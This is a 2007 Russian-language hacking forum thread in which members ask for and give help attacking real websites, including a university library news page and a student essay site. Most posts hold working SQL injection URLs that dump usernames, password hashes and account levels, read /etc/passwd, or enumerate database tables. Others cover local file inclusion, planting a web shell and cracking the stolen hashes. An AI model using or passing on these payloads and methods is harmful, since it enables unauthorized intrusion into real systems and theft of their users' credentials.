Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    http://www.site.com/main.php?id=1+UNION+SELECT+1,2,3,0x2F6574632F706173737764,5,6,7/*
     
  2. 5taY3r

    5taY3r Elder - Старейшина

    Joined:
    10 May 2007
    Messages:
    38
    Likes Received:
    35
    Reputations:
    0
    Что-то я не до конца догоняю,нужен хэлп...)
    Есть уязвимость, дб 5 версии
    Code:
    http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9/*
    Есть таблица 'users'(в других пусто), в ней колонки 'id,username,passwd,name,uwoemail,auth_type,auth_level,auth_status', но выводит только 'username,auth_type,auth_level,auth_status'(в остальных пишет ошибку)
    rgraves2:script:su:enabled
    Code:
    http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,username,auth_type,auth_level,auth_status),3,4,5,6,7,8,9+from+users+limit+0,1/*
    Что за херь?! Хэлп!
     
    #422 5taY3r, 11 Dec 2007
    Last edited: 11 Dec 2007
  3. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    в других БД значит вот например здесь есть:
    Code:
    http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,passwd,username,auth_type,auth_level,auth_status),3,4,5,6,7,8,9+from+calculator.users+limit+0,1/*
    
    еще в dissertations.users есть
     
    #423 Scipio, 12 Dec 2007
    Last edited: 12 Dec 2007
    2 people like this.
  4. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    595
    Reputations:
    567
    Code:
    http://www.lib.uwo.ca/news/view.php?id=-664' union select 1,COUNT(TABLE_SCHEMA),3,4,5,6,7,8,9 from information_schema.tables WHERE table_name='users'  limit 0,1/*
    тебе это ни о чем не говорит? Мне например что таблиц users всего 4-е o_O штуки и находятся они в 4-ех разных базах...
    Code:
    http://www.lib.uwo.ca/news/view.php?id=-664' union select 1,COUNT(COLUMN_NAME),3,DATABASE(),5,6,7,8,9 from information_schema.COLUMNS WHERE table_name='users'  AND TABLE_SCHEMA='feeds' limit 0,1/*
    Это же о том что в этой таблице 7 столбцов, ты написал 8 o_O... Эти столбцы: "username,fname,lname,email,auth_level,auth_status,auth_type"
    Ну и вот вывод:
    Code:
    http://www.lib.uwo.ca/news/view.php?id=-664' union select 1,CONCAT_WS(':',username,fname,lname,email,auth_level,auth_status,auth_type),3,DATABASE(),5,6,7,8,9 from users/*
     
    1 person likes this.
  5. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    существует дефолтная папка для мамбы?
     
  6. Girsoft

    Girsoft New Member

    Joined:
    22 Jan 2007
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    что можно сделать если на сайте есть скуль-инж. Я могу выводить в браузер данные юзеров. (мне их данные не нужны, админки нет). Если я впишу <? include("http://shell"); ?> а потом выведу его на экран, он не выполнится как пхп код? или выполнится? Почему?
    ---
    как можно заливать шелл с помощью скуль-инж в мускул сервере 5 версии? Load_File() не работает
     
  7. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    через into oufile еще можно... но видимо, т.к. привилегий file у юзера нет, то и это не прокатит. кстати, load_file нужен для чтения файлов, а не записи)
     
  8. SpYeR

    SpYeR New Member

    Joined:
    11 Nov 2007
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    Есть SQL-инъекция в запросе INSERT.
    Можно ли туда как-нибудь всунуть union или просто select? (кроме "on duplivate key..." и вставки ещё одного ряда)
    Спасибо.
     
    #428 SpYeR, 12 Dec 2007
    Last edited: 12 Dec 2007
  9. Girsoft

    Girsoft New Member

    Joined:
    22 Jan 2007
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    вопрос остался неотвеченым:
     
  10. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    SpYeR нет (читатай раздел статьи)

    Girsoft Куда впишешь? каким образом ты введешь на экран?

    Piflit Ответ ты можешь скачать в интренете и посмотреть
     
    1 person likes this.
  11. Girsoft

    Girsoft New Member

    Joined:
    22 Jan 2007
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    на сайте есть форма, всё введённое в неё добавляется в базу данных мускул 5 версии.(без фильтрации)
    есть скуль иньекция в (index.php?id=999+union+select+1,2,3,4/*) и я могу вывести на экран инфу, что я ввёл в форму (и то что другие ввели тоже, коненчо)
    (столбец 3 выводится на экран)
     
    #431 Girsoft, 12 Dec 2007
    Last edited: 12 Dec 2007
  12. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    ничего ты не зальешь, у тебя file_priv() отключен
     
  13. Girsoft

    Girsoft New Member

    Joined:
    22 Jan 2007
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    тоесть шелл через скулиньекцию можно залить только если file_priv() включён? (если исключить нестандартные ситуации, например что инклудятся файлы имя которых берётся из БД)

    И ещё один вопрос:

    на сайте есть уязвимость (локальный инклуд)

    index.php?menu=../../../../../etc/passwd%00

    На страницу выводятся пароли.
    От чего это пароли? Чем их расшифровать? Куда их вводить когда расшифровал?

    ВСЕМ УЧАСНИКАМ ТЕМЫ ОГРОМНЫЙ РЕСПЕКТ ЗА ПОМОЩЬ ЛЮДЯМ!!!
     
  14. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    очень странно, что ты нашел там пароли, пароли эти например от ssh или ftp
    99% "расшифровать" их можно с помощью passwordpro или jtr...

    но я опять же сомневаюсь, что хеши паролей там есть... про локальный инклюд читай здесь:http://forum.antichat.ru/showpost.php?p=495764&postcount=535
     
  15. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    как фильтрацию обойти ?
    http://fun2fon.ru/index.php?cntsearch='
    http://fun2fon.ru/index.php?cntsearch=-1+union+select+1/* что вообще можно сделать?
     
  16. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Да, толькое если есть файл прив. Иначе никак.

    Как таковые, эти пароли не особо нужны. Но, можно методом тыка найти довольно нужные файлы конфигов. Так же, просизвести локал инклуд. Т.е. если на том сайте где ты нашёл этот инклуд, есть загрузка каких либо файлов, то загружаешь этот файл с кодом шелла внутри, и уже инклудишь этот файл. Считай шелл у тебя на руках. Рекомендуется к прочтению (и копипасту:d):
    https://forum.antichat.ru/thread49775.html
    Хотя может это просто читалка файлов, выгоды от неё конечно меньше, т.к. код не интерпретируется, но и с неё можно получить выгоду.
     
  17. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    file_priv это не функция, не надо скобки ставить =)
     
    1 person likes this.
  18. Mike 007

    Mike 007 Elder - Старейшина

    Joined:
    4 Apr 2007
    Messages:
    58
    Likes Received:
    47
    Reputations:
    -4
    вот искал рефераты на тему алюминия...
    Code:
    http://studentport.su/referats/referat.php?id=23968
    http://studentport.su/referats/referat.php?id=-1'
    http://studentport.su/referats/referat.php?id=-1+order+by+11/*
    http://studentport.su/referats/referat.php?id=-1+union+selct+1,2,3,4,5,6,7,8,9,10,11/*
    помогите плииз :D
     
  19. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    А в чем сложность? это mssql
    Code:
    http://studentport.su/referats/referat.php?id=1+or+1=@@version
    Code:
    http://studentport.su/referats/referat.php?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
     
    #439 Scipio, 12 Dec 2007
    Last edited: 12 Dec 2007
    1 person likes this.
  20. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    У меня вопрос, почему при таком запросе ругается ?
    Code:
    http://studentport.su/referats/referat.php?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('page'))--
    Code:
    Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15) in c:\inetpub\wwwroot\referats\globals.php on line 86
     
Thread Status:
Not open for further replies.